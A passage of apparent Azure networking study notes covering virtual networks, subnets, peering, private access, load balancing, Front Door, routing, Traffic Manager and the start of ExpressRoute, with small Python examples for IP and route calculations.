    • Use Azure-provided DNS or bring your own DNS servers.
  7. Monitoring and Troubleshooting:

    • Monitor network performance and security with Azure Monitor and Network Watcher.
    • Diagnose and troubleshoot network issues efficiently.

Use Cases:

  • Deploying multi-tier applications with web, application, and database layers.
  • Extending on-premises networks to the cloud.
  • Isolating development, testing, and production environments.
  • Ensuring secure access to Azure services.
  • In addition to virtual machines, we can deploy more than 32 other services in a VNet.
  • Native internal TCP/UDP load balancing and proxy systems for internal HTTP(S) load balancing.
  • Connect to on-premises networks to form hybrid network architectures.

Differences between a vNet and an on-premises network:

  • Azure vNets do not support layer 2 semantics (only layer 3 and layer 4). This means that concepts such as vLANs and layer-2 broadcast/multicast are not supported. Running arp -a on a VM in Azure will show that MAC address resolution for VMs in the same subnet results in the same 12:34:56:78:9a:bc value. This is because we are on a shared platform and the vNet is a layer-3 construct.

  • Some protocols and communication types are restricted from being used in Azure vNets. Protocols such as multicast, broadcast, DHCP Unicast, UDP source port 65330, IP-in-IP encapsulated packets, and GRE are not supported.

vNet Naming

  • You can have two vNets in an Azure subscription with the same name as long as they are in different resource groups.

Address Spaces

  • When creating a VNet, you must specify an address space. This address space is a range of IP addresses that can be used by the resources in the VNet.
  • The address space can be either IPv4 or IPv6. However, a vNet cannot be IPv6 only.
  • You can create multiple address spaces in a vNet.
  • Though you can use any address space, it is recommended to use a private address space as defined in RFC 1918 (10.0.0.0/8, 172.16.0.0/12, or 192.168.0.0/16).
  • You cannot peer vNets with overlapping address spaces.
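
Because peering requires non-overlapping address spaces, it is worth checking planned ranges up front; a minimal sketch using Python's ipaddress module (the vNet names and CIDRs are hypothetical):

```python
import ipaddress

def overlapping_pairs(address_spaces: dict[str, str]) -> list[tuple[str, str]]:
    """Return pairs of vNets whose planned address spaces overlap (and so cannot be peered)."""
    nets = {name: ipaddress.ip_network(cidr) for name, cidr in address_spaces.items()}
    names = list(nets)
    return [(a, b) for i, a in enumerate(names) for b in names[i + 1:]
            if nets[a].overlaps(nets[b])]

# Hypothetical plan: 'hub' overlaps with 'spoke2', so that peering would be rejected.
plan = {"hub": "10.0.0.0/16", "spoke1": "10.1.0.0/16", "spoke2": "10.0.128.0/17"}
print(overlapping_pairs(plan))  # [('hub', 'spoke2')]
```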

Peering

  • vNET peering allows us to transfer data between vNETs within and across Azure Subscriptions.
  • Connect VNETs together using the Azure backbone network so that resources within the subnets can ‘talk’ to each other
  • VNETs with overlapping address spaces cannot be peered
  • vNET peering is easy to implement and requires no additional infrastructure. Peering can be set up between vNETs within minutes.
  • To implement the peering connection, the Network Contributor role or a custom role with the following permissions is required for both the source and destination vNETs:
    • Microsoft.Network/virtualNetworks/peer/action
    • Microsoft.Network/virtualNetworks/virtualNetworkPeerings/write
    • Microsoft.Network/virtualNetworks/virtualNetworkPeerings/read
  • vNET peering is not transitive. If vNET A is peered with vNET B and vNET B is peered with vNET C, vNET A and vNET C are not peered.

Connection vNETs using a VPN Gateway

  • In addition to peering, another option for connecting vNETs is to use a VPN Gateway connection.
  • This option uses an Azure VPN Gateway to create a secure IPSec/IKE tunnel to the target network.
  • Unlike peering, traffic is encrypted using an IPsec/IKE tunnel; per the VPN Gateway FAQ, vNET-to-vNET traffic still travels across the Microsoft backbone, not the public internet.
  • Deploying the VPN Gateway takes around 40 minutes.
  • When implementing the VPN Gateway to connect two vNETs, there are two connection types that we can use:
    • vNET-to-vNET: Connects two vNETs in the same Azure Subscription.
    • Site-to-Site: Connects two vNETs in different Azure Subscriptions
  • You can use this option to connect vNETs with overlapping address spaces by configuring NAT rules on the VPN Gateway

vWAN Hub

vWAN Notes

Comparing vNET Peering vs. VPN Gateway vs. vWAN Hub

Feature | Peering | VPN Gateway | vWAN Hub
Definition | Direct connection between VNets | Connection using a VPN gateway | Connection via Virtual WAN Hub
Use Case | Low latency, high-speed connection within the same region | Secure cross-region or hybrid connectivity | Scalable, centralized management of large-scale network architecture
Bandwidth | Up to 10 Gbps | Dependent on gateway SKU | Up to 20 Gbps (depending on the hub scale)
Latency | Low | Higher due to encryption | Variable, generally higher than peering
Encryption | Not supported | Supported | Supported
Routing | Manual configuration | Supports BGP, more complex routing | Simplified with centralized control
Cost | Lower, based on data transfer | Higher, based on gateway and data transfer | Variable, based on hub and data transfer
Scalability | Limited to same region | Cross-region, but limited by gateway scale | Highly scalable for global networks
Security | Less secure, no encryption | More secure with encryption | High security with built-in features
Complexity | Simple to configure | Moderate complexity | High complexity, but with centralized management tools
Cross-Subscription | Supported | Supported | Supported
Cross-Tenant | Not supported | Not supported | Supported
Redundancy | Depends on setup | High availability supported | High availability and redundancy supported
Additional Features | Supports private endpoints and service chaining | Supports VPN, ExpressRoute | Integrated with Azure Firewall, Application Gateway, etc.

Azure Subnets

Definition

Azure subnets are subdivisions of an Azure Virtual Network (VNet). They help organize and secure your Azure resources by segmenting the VNet into smaller, manageable sections.

Key Features

  1. IP Address Range:

    • Each subnet must have a unique IP address range within the VNet.
    • The address range is defined in CIDR notation (e.g., 10.0.0.0/24).
  2. Network Security:

    • Use Network Security Groups (NSGs) to control inbound and outbound traffic at the subnet level.
    • NSGs can be associated with one or more subnets, defining security rules for the subnet.
  3. Routing:

    • Subnets can have custom route tables associated with them.
    • Custom routes can direct traffic to specific network appliances or on-premises networks.
  4. Service Endpoints:

    • Enable service endpoints to secure Azure service resources (like Azure Storage or Azure SQL Database) to your VNet.
    • Traffic to these services can remain within the Azure backbone network.
  5. Integration with Azure Services:

    • Subnets can host various Azure resources, such as Virtual Machines (VMs), Azure Kubernetes Service (AKS), and App Service Environments (ASE).
    • Subnets can be part of an Azure Availability Zone, enhancing resilience and availability.
    • A full list of services that support vNet integration can be found here: Azure Services that support vNet Integration
  6. Subnet Delegation:

    • Delegate a subnet to specific Azure services to simplify network configuration and management.
    • Examples of delegatable services include Azure Container Instances and Azure App Service.
  7. Subnet Peering:

    • Use VNet peering to connect subnets across different VNets, allowing resources to communicate securely.
    • Peered VNets can be within the same region or across different Azure regions (Global VNet Peering).

Best Practices

  1. Designing Subnets:

    • Plan subnets based on application tiers (e.g., web, application, database) to improve security and manageability.
    • Ensure enough IP addresses in each subnet to accommodate future growth.
  2. Security:

    • Apply NSGs at both the subnet and network interface level for layered security.
    • Regularly review and update NSG rules to maintain optimal security.
  3. Monitoring and Management:

    • Use Azure Monitor and Network Watcher to monitor subnet performance and diagnose network issues.
    • Implement logging for NSGs to track and analyze network traffic.
  4. IP Address Management:

    • Avoid overlapping IP address ranges when peering VNets.
    • Use private IP ranges for subnets to ensure secure and efficient routing within Azure.

Use Cases

  • Isolating Resources: Segregate different types of workloads or environments (development, testing, production) within a VNet using NSGs.
  • Enhanced Security: Apply NSGs to subnets for controlling traffic flow and securing resources.
  • Network Organization: Organize resources logically within a VNet for better management and scalability.
  • Service Integration: Securely connect Azure services to your VNet using service endpoints or private link.

Facts

  • A vNet can have up to 3000 subnets
  • Azure reserves 5 IP addresses within each subnet for system use; the first four and the last IP address in each subnet cannot be allocated to a resource (see the sizing sketch at the end of this section).
    • The first IP address is the network address.
    • The last IP address is the broadcast address.
    • The next three IP addresses are reserved for Azure services. (Default Gateway and 2 DNS Servers)
  • If you need to modify the address space of a subnet that already has resources in it, you must first remove all resources from the subnet.

Azure subnets are essential for structuring your VNet, ensuring security, and managing resources efficiently within your Azure environment.
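
Given the five reserved addresses noted in the Facts above, a quick way to sanity-check subnet sizing is sketched below (a simplified model of the reservation rule, not an Azure API call):

```python
import ipaddress

def azure_usable_ips(cidr: str) -> int:
    """Usable IPs in an Azure subnet: total addresses minus the 5 Azure reserves
    (network address, default gateway, two Azure DNS addresses, broadcast)."""
    subnet = ipaddress.ip_network(cidr)
    return max(subnet.num_addresses - 5, 0)

print(azure_usable_ips("10.0.1.0/24"))  # 251
print(azure_usable_ips("10.0.2.0/29"))  # 3 -- /29 is the smallest subnet size Azure supports
```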

Design-and-implement-private-access

Directory Map

Private Link

A private endpoint is a network interface that connects you privately and securely to a service powered by Azure Private Link. Here are the key points about Private Link and private endpoints:

  • Private Link/private endpoints offer an advantage over the service endpoint option. On-premises networks can access platform services privately over an ExpressRoute or VPN connection through the private endpoint. Service endpoints do not offer this capability.
  • If we have implemented a virtual WAN architecture, private endpoints can only be deployed on spoke virtual networks connected to the virtual hub. Implementing private endpoints directly on the virtual hub is not supported.
  • Supported Azure services can be accessed over private endpoints, but you need to register those private endpoint records in a corresponding private DNS zone.

Azure Service Endpoint

Overview

Azure Service Endpoint is a feature that provides direct connectivity from a virtual network to Azure services. It extends the identity of your virtual network to the Azure services over a direct connection. The traffic to the Azure service always remains on the Microsoft Azure backbone network. Service Endpoints are not supported across different AD tenants for most services, except for Azure Storage and Azure Key Vault.

Service Endpoint Policy

Service Endpoint Policies allow us to control the Azure Service that will be reachable via a Service Endpoint. They provide an additional layer of security to ensure that a service endpoint cannot be used to access all instances of a resource type. For example, if we have a Microsoft.Storage service endpoint on a subnet, we can create a Service Endpoint Policy to allow access to only a specific storage account. Without the policy, the service endpoint can be used to access all storage accounts in the region.

  • Currently, only the Microsoft.Storage provider is compatible with Service Endpoint Policies.
  • We can scope access to one of three options:
    • All storage accounts in the subscription
    • All storage accounts in a specific resource group
    • A specific storage account

Example Usage

  1. Create a Service Endpoint Policy
  2. Associate the Service Endpoint Policy with a subnet

Service Endpoint Policy

Design-and-implement-routing

Directory Map

Application Gateway

Overview

  • An Azure Application Gateway is a regional web traffic load balancer that enables you to manage traffic to your web applications. It provides various layer 7 load balancing capabilities for your applications, including SSL termination, cookie-based session affinity, URL-based routing, and multi-site routing. Here are the key features and benefits of Azure Application Gateway:
  • Layer 7 Load Balancing: Application Gateway operates at the application layer (layer 7) of the OSI model, allowing you to route traffic based on URL paths or hostnames.
  • SSL Termination: Application Gateway can terminate SSL connections, offloading the SSL decryption/encryption process from your web servers.
  • Cookie-Based Session Affinity: Application Gateway supports cookie-based session affinity, ensuring that client requests are directed to the same backend server for the duration of a session.
  • URL-Based Routing: You can configure Application Gateway to route traffic based on URL paths, enabling you to direct requests to different backend pools based on the URL.
  • Multi-Site Routing: Application Gateway supports routing traffic to multiple websites hosted on the same set of backend servers, allowing you to host multiple sites on a single set of servers.
  • Web Application Firewall (WAF): Application Gateway includes a Web Application Firewall (WAF) that provides protection against common web vulnerabilities and attacks, such as SQL injection and cross-site scripting.

Use Cases

  • Web Application Load Balancing: Application Gateway is commonly used to distribute traffic across multiple web servers hosting web applications.
  • SSL Offloading: By terminating SSL connections at the gateway, Application Gateway can reduce the load on backend servers and improve performance.
  • Session Affinity: Cookie-based session affinity ensures that client requests are consistently directed to the same backend server, maintaining session state.
  • URL-Based Routing: Application Gateway can route traffic based on URL paths, enabling you to direct requests to specific backend pools based on the URL.

Components

  • Frontend IP Configuration: Defines the public IP address and port used to access the Application Gateway.

  • Backend Target:

    • Backend Pool: Contains the backend servers that receive the traffic from the Application Gateway. Consists of Azure VMs, VM Scale Sets (VMSS), Azure Web Apps, or on-premises servers.
    • Redirection: Redirects traffic to an external site or a listener.
      • An external site refers to an endpoint outside of the application gateway.
  • HTTP Settings: Define how the Application Gateway communicates with the backend servers, including port, protocol, and cookie settings.

  • HTTP Listener: Listens for incoming HTTP/HTTPS traffic and routes it to the appropriate backend pool based on the URL path or hostname.

  • URL Path-Based Routing Rules: Define rules that route traffic to different backend pools based on the URL path.
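
Conceptually, URL path-based routing is just a longest-prefix match from the request path to a backend pool; the sketch below illustrates the idea only (the path patterns and pool names are hypothetical, and this is not how the gateway is actually configured):

```python
# Hypothetical path map: the longest matching path pattern wins, '/*' is the default.
PATH_MAP = {
    "/images/*": "image-pool",
    "/api/*": "api-pool",
    "/*": "default-pool",
}

def route(path: str) -> str:
    """Pick the backend pool whose path pattern has the longest matching prefix."""
    candidates = [(pattern, pool) for pattern, pool in PATH_MAP.items()
                  if path.startswith(pattern.rstrip("*"))]
    return max(candidates, key=lambda c: len(c[0]))[1]

print(route("/images/logo.png"))  # image-pool
print(route("/api/v1/orders"))    # api-pool
print(route("/index.html"))       # default-pool
```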

Deployment

  • Application Gateway must be deployed into a dedicated subnet within a virtual network (the subnet can only contain Application Gateway resources).
  • You can create an Application Gateway using the Azure portal, Azure PowerShell, Azure CLI, or ARM templates.

Tiers

  • Standard: Offers additional features such as autoscaling, SSL offloading
    • The standard tier offers 3 size options: Small, Medium, and Large
  • WAF: Provides protection against common web vulnerabilities and attacks.
    • The WAF tier offers 2 size options: Medium and Large

WAF

  • The Web Application Firewall (WAF) feature of Application Gateway provides centralized protection for your web applications from common web-based attacks.
  • WAF uses OWASP (Open Web Application Security Project) rules to protect against threats such as SQL injection, cross-site scripting, and remote file inclusion.
  • You can customize WAF rules to meet the specific security requirements of your web applications.
  • WAF logs provide detailed information about web application attacks and security events, helping you monitor and respond to potential threats.
  • There are two tiers of WAF available: WAF v1 and WAF v2. WAF v2 offers enhanced security features and performance improvements over WAF v1.

Backend Targets

  • Two types of backend targets can be configured:
    • backend pools
      • a collection of IP addresses or FQDNs, VM instances or VMSS
      • You can configure up to 100 backend address pools and 1200 targets per pool
    • redirection
      • Redirections are used to redirect incoming traffic from the application gateway to an external site or listener

Azure Availability Sets

Azure Availability Sets are a feature in Microsoft Azure that ensures high availability for your virtual machines (VMs). They provide redundancy and improve the reliability of applications and services by distributing VMs across multiple isolated hardware nodes within a data center. Here are the key points about Azure Availability Sets:

  1. Fault Domains: VMs within an availability set are spread across multiple fault domains, which are groups of hardware that share a common power source and network switch. This distribution helps to protect your application from hardware failures.

  2. Update Domains: VMs are also spread across multiple update domains, which are groups of hardware that can be updated and rebooted simultaneously. This minimizes the impact of maintenance operations, ensuring that not all VMs are down during updates.

  3. Redundancy and Resilience: By spreading VMs across different fault and update domains, availability sets ensure that at least some instances of your application remain running during hardware failures or maintenance events.

  4. Service Level Agreement (SLA): Using availability sets can help you achieve a higher SLA for your application. Azure provides a 99.95% SLA for VMs that are part of an availability set.

  5. Scalability: Availability sets allow you to scale your application horizontally by adding more VMs, which are automatically distributed across fault and update domains.

  6. Configuration: When creating an availability set, you can specify the number of fault and update domains. Azure will then manage the distribution of your VMs accordingly.

By using Azure Availability Sets, you can enhance the availability and reliability of your applications and services.
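
The spreading across fault and update domains can be pictured as simple round-robin placement; a toy sketch of the concept (not Azure's actual placement algorithm):

```python
def place_vms(vm_count: int, fault_domains: int = 3, update_domains: int = 5) -> list[dict]:
    """Round-robin VMs across fault and update domains, as an availability set does conceptually."""
    return [{"vm": f"vm{i}",
             "fault_domain": i % fault_domains,
             "update_domain": i % update_domains}
            for i in range(vm_count)]

for placement in place_vms(7):
    print(placement)
# No single fault domain or update domain holds all 7 VMs, so a hardware
# failure or planned maintenance event only takes down a subset of them.
```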

Azure Availability Zones

Azure Availability Zones are a high-availability offering that protects applications and data from data center failures. They are physically separate locations within an Azure region, each with independent power, cooling, and networking. Here are the key points about Azure Availability Zones:

  1. Physical Separation: Availability Zones are isolated from each other, ensuring that a failure in one zone does not affect the others. This physical separation enhances fault tolerance and disaster recovery.

  2. Redundancy and Reliability: Applications and data are replicated across zones, providing redundancy and higher reliability. This helps to ensure that services remain available even if one zone experiences an outage.

  3. Service Level Agreement (SLA): Azure offers a 99.99% SLA for virtual machines running in availability zones, which is higher than the SLA for availability sets.

  4. Data Residency: Availability Zones ensure that your data remains within the same Azure region, complying with data residency and compliance requirements.

  5. Automatic Replication: Services such as virtual machines, managed disks, and databases can be automatically replicated across zones to ensure high availability.

  6. Scalability: Availability Zones support scaling out applications by deploying resources across multiple zones, thereby improving performance and availability.

  7. Disaster Recovery: By using availability zones, you can implement robust disaster recovery solutions, minimizing downtime and data loss during catastrophic events.

By leveraging Azure Availability Zones, you can significantly enhance the availability, reliability, and resilience of your applications and services.

Azure Front Door

  • Azure Front Door is a global, scalable entry-point that uses the Microsoft global edge network to create fast, secure, and widely scalable web applications.
  • Azure Front Door provides a range of features, including global load balancing, WAF capabilities, and static and dynamic content caching (CDN) capabilities.
  • By default, Azure Front Door will route requests to the endpoint with the lowest latency using one of its 150 global points of presence.

Overview

  • Global Load Balancing: Azure Front Door provides global load balancing to ensure that users are directed to the closest and healthiest endpoint.
  • Web Application Firewall (WAF): Azure Front Door includes a Web Application Firewall (WAF) that provides protection against common web vulnerabilities and attacks.
  • SSL Offloading: Azure Front Door can terminate SSL connections, offloading the SSL decryption/encryption process from your web servers.
  • Session Affinity: Azure Front Door supports session affinity, ensuring that client requests are directed to the same backend server for the duration of a session.
  • URL-Based Routing: You can configure Azure Front Door to route traffic based on URL paths, enabling you to direct requests to different backend pools based on the URL.
  • Custom Domains: Azure Front Door supports custom domains, allowing you to use your own domain name for the service.
  • Scalability: Azure Front Door is designed to scale automatically based on demand, ensuring that your application can handle increased traffic.
  • Monitoring and Analytics: Azure Front Door provides detailed monitoring and analytics to help you track the performance and health of your web applications.
  • High Availability: Azure Front Door is built on a highly available and resilient infrastructure, ensuring that your applications remain accessible even in the event of failures.
  • Integration with Azure Services: Azure Front Door can be integrated with other Azure services, such as Azure CDN and Azure Application Gateway, to provide additional functionality and capabilities.

CDN

  • Azure Front Door can serve as a content delivery network (CDN) by caching content at edge locations to reduce latency and improve performance.

Components

  • An instance of the Front Door service is referred to as the Front Door Profile. We can create up to 500 Standard or Premium Front Door Profiles per subscription.
  • To perform its functions, Azure Front Door relies on 3 components:
    • Endpoints: Receives incoming traffic
      • 10 endpoints can be created for a Standard Tier Front Door Profile.
      • 25 Endpoints can be created for a Premium Tier Profile.
      • When you create an endpoint, a default domain name is created for you. You can choose to create a custom domain as well. Standard Tier supports up to 100 custom domains, while Premium Tier supports up to 500 custom domains.
        • When adding a custom domain, HTTPS is enforced and we need to specify the SSL/TLS certificate to use. Two options are available for this:
          • Azure Managed Certificate: Azure Front Door will automatically create and manage the certificate for you. Not available for Wildcard domains. Only available for apex domains and subdomains.
          • Bring Your Own Certificate (BYOC): You can upload your own certificate.
          • Renewal for apex domain certificates requires domain revalidation.
    • Origin Groups: Like a backend pool, where requests are distributed to.
      • Front Door supports both Azure and non-Azure endpoints.
    • Routes: Map Endpoints to Origin Groups
      • We can add up to 100 routes for a Standard Tier Front Door Profile and 200 routes for a Premium Tier Profile.

Rule Sets

  • To perform more granular processing or customization beyond the capabilities of routes in Front Door, we can use rule sets. A rule set is a collection of rules applied to incoming traffic at the Front Door edge. They allow for granular customization of how requests are handled and can even override the origin group for a given request. A Standard tier resource can have a maximum of 100 rule sets, while a Premium tier resource can have up to 200 rule sets.
  • Rule sets consist of if/then/else rules.
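
Conceptually, each rule pairs a match condition with one or more actions applied at the edge; a tiny sketch of that if/then evaluation (the conditions and actions are invented for illustration and do not reflect Front Door's configuration schema):

```python
# Hypothetical rule set: each rule has a match condition and the actions to apply.
RULES = [
    {"if": lambda req: req["path"].startswith("/legacy/"),
     "then": {"redirect": "https://new.example.com"}},
    {"if": lambda req: req["device"] == "mobile",
     "then": {"override_origin_group": "mobile-origins"}},
]

def apply_rules(request: dict) -> dict:
    """Evaluate rules in order and merge the actions of every rule whose condition matches."""
    result = dict(request)
    for rule in RULES:
        if rule["if"](result):
            result.update(rule["then"])
    return result

print(apply_rules({"path": "/legacy/home", "device": "desktop"}))
print(apply_rules({"path": "/app", "device": "mobile"}))
```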

Service Tiers (SKU)

  • Azure Front Door is offered in 3 tiers:

    • Classic: The original service tier for Front Door. Uses the Microsoft.Network provider and does not support many newer features. Microsoft no longer recommends using this tier and offers a zero-downtime migration path to the Standard and Premium tiers.
    • Standard: Uses the Microsoft.Cdn provider.
    • Premium: Uses the Microsoft.Cdn provider.

Azure Load Balancer

Backend Pools

  • Backend pools contain resources for the load balancer to distribute traffic to
  • Resources can be VMs, VMSS, or IP addresses

Health Probes

  • You can configure Health Probes so that the load balancer only sends traffic to a healthy instance of the backend pool

SKUs

  • Standard

    • Charge per hour
    • The machines in the backend pool can be in an Availability Set, VMSS, or stand-alone VMs
    • Health Probes can be TCP, HTTP, or HTTPS
    • Supports Availability Zones
    • 99.99% SLA
    • Requires that the public IP address also be in the Standard SKU
    • Can be implemented as a public or internal load balancer
    • Supports a global deployment option, but you must choose a ‘home’ region. The backend pool will then have one or more regional load balancers. The frontend IP must be static and is advertised to other Azure regions via Anycast.
    • The standard load balancer has 3 availability zone configuration options: zonal, zone-redundant, and non-zonal.
      • a zonal configuration allows the load balancer to distribute requests to resources in a single zone
      • a non-zonal configuration is relatively uncommon and is generally used to distribute requests to workloads that have not been pinned to a specific zone.
      • a zone-redundant configuration allows the load balancer to distribute requests to resources in any zone the load balancer is deployed in.
  • Basic (Retiring soon)

    • Free
    • The machines in the backend pool need to be part of an availability set or VMSS
    • Health probes can be TCP or HTTP
    • No support for Availability Zones
    • No SLA
  • Gateway

    • Catered for high-performance and HA scenarios with third-party NVAs (Network Virtual Appliances)

NAT

  • You can use NAT rules to translate a single public IP address into multiple backend resources with private IP addresses

Outbound Rules

Azure Load Balancer outbound rules define how outbound connections from your virtual machines (VMs) are handled. These rules determine the allocation and management of public IP addresses for outbound traffic from VMs within a virtual network. Here are the key points about Azure Load Balancer outbound rules:

  1. Outbound Connectivity: Outbound rules provide connectivity for VMs to the internet by assigning a public IP address to the outbound traffic, ensuring VMs can initiate connections to external resources.
  2. SNAT (Source Network Address Translation): Outbound rules use SNAT to translate private IP addresses of VMs to a public IP address for outbound traffic. This allows multiple VMs to share the same public IP for outbound connections.
  3. Public IP Allocation: You can associate a public IP address or a pool of public IP addresses with the load balancer to manage outbound connectivity. This provides control over the IP addresses used for outbound traffic.
  4. Port Management: Outbound rules manage the available ports for outbound connections. By default, Azure Load Balancer uses ephemeral ports for SNAT, but you can configure custom port ranges to optimize the use of available ports.
  5. Idle Timeout: Outbound rules include an idle timeout setting that defines the duration a connection can remain idle before being closed. This helps manage and free up unused connections.
  6. Scaling: Outbound rules support scaling scenarios where you can distribute outbound traffic across multiple public IP addresses to handle high traffic volumes and ensure availability.
  7. Configuration: Outbound rules can be configured in the Azure portal, through Azure PowerShell, or using Azure CLI. You can specify parameters such as the public IP address, port ranges, and idle timeout settings.
  8. Security: By controlling outbound traffic through outbound rules, you can enhance the security of your VMs by ensuring that only allowed outbound connections are established.

By configuring Azure Load Balancer outbound rules, you can effectively manage and optimize the outbound connectivity of your virtual machines, ensuring reliable and controlled access to external resources.
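
As a rough mental model only (Azure actually allocates SNAT ports in fixed-size buckets based on backend pool size), each public frontend IP provides on the order of 64,000 SNAT ports that are shared by the backend VMs:

```python
def snat_ports_per_vm(public_ips: int, backend_vms: int, ports_per_ip: int = 64_000) -> int:
    """Simplified even-split model of SNAT port capacity per VM: more backend VMs sharing
    the same frontend IPs means fewer concurrent outbound flows each (Azure's real
    allocation uses fixed port buckets, but the intuition is the same)."""
    return (public_ips * ports_per_ip) // backend_vms

print(snat_ports_per_vm(public_ips=1, backend_vms=10))  # 6400
print(snat_ports_per_vm(public_ips=2, backend_vms=10))  # 12800
```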

Internal Azure Load Balancer

An Internal Azure Load Balancer (ILB) is a load balancing service that distributes network traffic across virtual machines (VMs) within a virtual network (VNet) without exposing them to the internet. It is designed for private, internal applications and services. Here are the key points about an Internal Azure Load Balancer:

  1. Private IP Address: The ILB operates using a private IP address within your VNet, ensuring that traffic is only accessible internally and not exposed to the internet.
  2. Load Balancing Algorithms: ILB distributes incoming traffic across multiple VMs using various load balancing algorithms, such as round-robin and hash-based distribution, to optimize resource usage and performance.
  3. High Availability: By distributing traffic across multiple VMs, ILB enhances the availability and reliability of your internal applications and services, ensuring they remain accessible even if individual VMs fail.
  4. Health Probes: ILB uses health probes to monitor the status of VMs and ensure traffic is only directed to healthy instances. This helps maintain the stability and performance of your applications.
  5. Configuration Flexibility: You can configure ILB to balance traffic for different types of services, such as TCP, UDP, HTTP, and HTTPS, allowing for a wide range of internal application scenarios.
  6. Integration with Network Security: ILB can be integrated with Azure Network Security Groups (NSGs) and Azure Firewall to enhance the security of your internal network traffic.
  7. Scalability: ILB supports scaling out by adding more VMs to the backend pool, ensuring that your internal applications can handle increased traffic and load.
  8. Use Cases: Common use cases for ILB include load balancing for internal line-of-business applications, databases, private APIs, and microservices within a VNet.
  9. Configuration Management: ILB can be configured and managed using the Azure portal, Azure PowerShell, Azure CLI, and Azure Resource Manager (ARM) templates.

By using an Internal Azure Load Balancer, you can efficiently manage and distribute internal network traffic, ensuring high availability, performance, and security for your private applications and services.

Cross Region (Global) Load Balancer

  • Cross region load balancer is a global load balancer that can distribute traffic across multiple regions
  • You must still create a load balancer in each region
  • The global load balancer must be deployed in a ‘home region’
  • A global load balancer must be a public, Standard SKU load balancer
  • The global load balancer uses the geo-proximity load-balancing algorithm to determine the optimal routing path for network traffic. This algorithm directs requests to the nearest “participating” region based on the geographic location of the client creating the request.

Azure Virtual Network Routing

System Routes

  • Azure vNet system routes are automatically created and maintained by Azure to enable routing between subnets, on-premises networks, and the internet.
  • Azure vNet system routes are automatically associated via a default route table to the vNet.
  • System Routes are a collection of routing entries that define several destination networks and the next hop to send the traffic to. This is the path that the traffic should follow to get to the destination.

Modifying the default routing behavior

  • You can override the default system routes by creating User Defined Routes (UDRs) and associating them with subnets in your Azure Virtual Network (VNet) or by using BGP.

User Defined Routes (UDR)

  • You can have up to 200 custom route tables per region per subscription.
  • A subnet can be associated with only one route table at a time.
  • Azure User Defined Routes (UDR) allow you to control the routing of traffic leaving a subnet in an Azure Virtual Network (VNet).
  • UDRs are used to override Azure’s default system routes, which control traffic between subnets, on-premises networks, and the internet.
  • UDRs can be used to direct traffic to specific next hops, such as virtual appliances, network virtual appliances (NVAs), or virtual machines (VMs).
  • UDRs are associated with subnets within a VNet and are evaluated in priority order to determine the routing of outbound traffic.
  • UDRs can be created, modified, and deleted using the Azure portal, Azure PowerShell, Azure CLI, or Azure Resource Manager (ARM) templates.
  • UDRs are commonly used in scenarios where you need to route traffic through specific network devices, apply network security policies, or optimize traffic flow within your Azure environment.
  • UDRs can be used in conjunction with Azure Virtual Network Gateways, Azure ExpressRoute, Azure VPN Gateway, and other networking services to control the flow of traffic in and out of your Azure Virtual Network.
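
Route selection itself is a longest-prefix match over the effective routes (system, UDR, and BGP combined; when prefix lengths tie, Azure prefers user-defined routes over BGP routes over system routes). The sketch below shows just the matching step, with made-up routes:

```python
import ipaddress

# Hypothetical effective route table: destination prefix -> next hop type
ROUTES = {
    "0.0.0.0/0": "Internet",            # default system route
    "10.0.0.0/16": "VnetLocal",         # intra-vNet system route
    "10.0.2.0/24": "VirtualAppliance",  # UDR forcing one subnet's traffic through an NVA
}

def next_hop(destination_ip: str) -> str:
    """Longest-prefix match: the most specific route containing the destination wins."""
    dest = ipaddress.ip_address(destination_ip)
    matches = [ipaddress.ip_network(prefix) for prefix in ROUTES
               if dest in ipaddress.ip_network(prefix)]
    best = max(matches, key=lambda net: net.prefixlen)
    return ROUTES[str(best)]

print(next_hop("10.0.2.25"))  # VirtualAppliance (the UDR overrides the broader system routes)
print(next_hop("10.0.9.9"))   # VnetLocal
print(next_hop("8.8.8.8"))    # Internet
```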

Traffic Manager

Traffic Manager is a DNS-based traffic load balancing service.

Overview

  • Traffic manager is a global service. You do not select a region when you deploy it.
  • Traffic Manager uses DNS to direct client requests to the most appropriate service endpoint based on a traffic-routing method and the health of the endpoints.
  • Traffic Manager can improve the availability and responsiveness of your application.
  • Traffic Manager can be used to:
    • Load balance incoming traffic across multiple Azure regions
    • Route traffic to a specific region based on the client’s geographic location
    • Route traffic to a specific region based on the endpoint’s health
    • Route traffic to a specific region based on the endpoint’s performance
  • Traffic Manager supports multiple DNS routing methods, including:
    • Priority
    • Weighted
    • Performance
    • Geographic
    • Multi-value
  • Traffic Manager can be used with Azure services, external services, and on-premises services. The endpoint must be public.
    • Traffic Manager does not support routing to private IP addresses.

Endpoint types:

  • Azure Endpoint:
    • Cloud Service, Web App, Public IP
  • External Endpoint
  • Nested TM Profile

Traffic Routing Methods

  • Priority Routing Method
    • Traffic Manager directs traffic to the primary endpoint. If the primary endpoint is unavailable, Traffic Manager fails over to the secondary endpoint.
  • Performance Routing Method
    • Traffic Manager directs traffic to the endpoint with the lowest latency.
  • Geographic Routing Method
    • Traffic Manager directs traffic to the endpoint based on the geographic location of the client (where the DNS query originates from).
  • Subnet Routing Method
    • Traffic Manager directs traffic to the endpoint based on the IP address of the client.
  • Weighted Routing Method
    • Traffic Manager distributes traffic across multiple endpoints based on a user-defined weight.
  • Multi-value Routing Method
    • Traffic Manager returns multiple endpoints in the DNS response, and the client selects one.
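
As a sketch of the Priority method described above, using Azure PowerShell (the profile name, DNS prefix, and endpoint hostnames are placeholder assumptions):

# Create a Traffic Manager profile that uses Priority routing
$tmProfile = New-AzTrafficManagerProfile -Name 'tm-demo' -ResourceGroupName 'rg-demo' `
    -TrafficRoutingMethod Priority -RelativeDnsName 'tm-demo-unique' -Ttl 30 `
    -MonitorProtocol HTTPS -MonitorPort 443 -MonitorPath '/'

# Primary endpoint (priority 1) and failover endpoint (priority 2); endpoints must be public
New-AzTrafficManagerEndpoint -Name 'primary' -ProfileName 'tm-demo' -ResourceGroupName 'rg-demo' `
    -Type ExternalEndpoints -Target 'app-eastus.example.com' -EndpointStatus Enabled -Priority 1
New-AzTrafficManagerEndpoint -Name 'secondary' -ProfileName 'tm-demo' -ResourceGroupName 'rg-demo' `
    -Type ExternalEndpoints -Target 'app-westeurope.example.com' -EndpointStatus Enabled -Priority 2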

Design-implement-and-manage-hybrid-networking

Directory Map

Azure Express Route

Overview

  • Azure ExpressRoute lets you extend your on-premises networks into the Microsoft cloud over a private connection facilitated by a connectivity provider.
  • With ExpressRoute, you can establish connections to Microsoft cloud services, such as Microsoft Azure, Office 365, and Dynamics 365.
  • ExpressRoute connections do not go over the public Internet, and offer more reliability, faster speeds, lower latencies, and higher security than typical connections over the Internet.
